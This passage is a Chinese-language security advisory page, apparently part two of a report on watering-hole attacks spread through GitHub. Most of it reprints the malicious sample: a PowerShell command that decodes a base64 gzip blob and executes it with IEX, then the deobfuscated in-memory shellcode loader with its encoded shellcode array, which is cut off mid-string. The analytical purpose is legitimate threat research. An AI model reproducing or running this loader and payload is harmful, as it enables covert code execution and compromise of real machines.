江苏龙网

  1. 主页 > 生活百科 > >

警惕!利用Github进行水坑攻击安全风险通告( 二 )

水坑攻击


将powershell的base64进行解密,获得真实代码 。
PowerShell
$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("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"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
得到被混淆的代码,将末尾iex修改为输出,获得解密后的代码 。
PowerShell
Set-StrictMode -Version 2
$DoIt = @'
function func_get_proc_address {
Param ($var_module, $var_procedure)
$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNat
iveMethods')
$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')
).Invoke($null, @($var_module)))), $var_procedure))
}
 
function func_get_delegate_type {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
[Parameter(Position = 1)] [Type] $var_return_type = [Void]
)
$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicMod
ule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')
 
return $var_type_builder.CreateType()
}
 
[Byte[]]$var_code = [System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFq


推荐阅读


上一篇:Python 3.11比3.10 快60%:使用冒泡排序和递归函数对比测试

下一篇:爬虫总是断?用这个手残党也能轻松解决网站反爬